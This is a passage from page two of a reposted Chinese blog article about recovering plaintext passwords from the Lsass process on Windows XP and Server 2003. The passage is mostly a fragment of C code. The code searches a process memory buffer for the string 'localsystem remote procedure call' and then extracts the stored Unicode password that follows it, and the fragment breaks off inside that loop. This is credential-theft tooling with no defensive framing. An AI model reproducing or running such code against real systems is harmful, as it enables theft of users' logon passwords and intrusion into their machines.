[收藏本方案]

XP 和2003的Lsass进程中明文密码[2]

[入库:2005年8月18日] [更新:2007年3月24日]

本文简介:选择自 kernet 的 blog
首页 下页 尾页 [1] [2] [3]

set = 0;
            if (strnicmp(&buffer[i + offset],"localsystem",strlen("localsystem")) == 0)
            {
                offset += strlen("localsystem") + 1;
                if (strnicmp(&buffer[i + offset],"remote",strlen("remote")) == 0)
                {
                    offset += strlen("remote") + 1;
                    if (strnicmp(&buffer[i + offset],"procedure",strlen("procedure")) == 0)
                    {
                        offset += strlen("procedure") + 1;
                        if (strnicmp(&buffer[i + offset],"call",strlen("call")) == 0)
                        {
                            i += offset;
                            break;
                        }
                    }
                }
            }
        }
    }
    if (i < nsize)
    {
        zeromemory(password,sizeof(password));
        for (; i < nsize ; i++)
        {
            if (buffer[i] == 0x02 && buffer[i + 1] == 0 && buffer[i + 2] == 0 && buffer[i + 3] == 0 && buffer[i + 4] == 0 && buffer[i + 5] == 0 && buffer[i + 6] == 0)
            {
                /* the below code is to retrieve the password.since the string is in unicode format,so we will do it in
                that way
                */
                j = i + 7;
                for (; j < nsize; j += 2)
                {
                    if (buffer[j] >  0)
                    {
                        password[count++] = buffer[j];
                    }
                    else
                    {
       &

首页 下页 尾页 [1] [2] [3]
本文关键:XP 和2003的Lsass进程中明文密码
  相关方案
Google
 

本站最佳浏览方式为 分辨率 1024x768 IE 6.0(或更高版本的 IE浏览器)

go top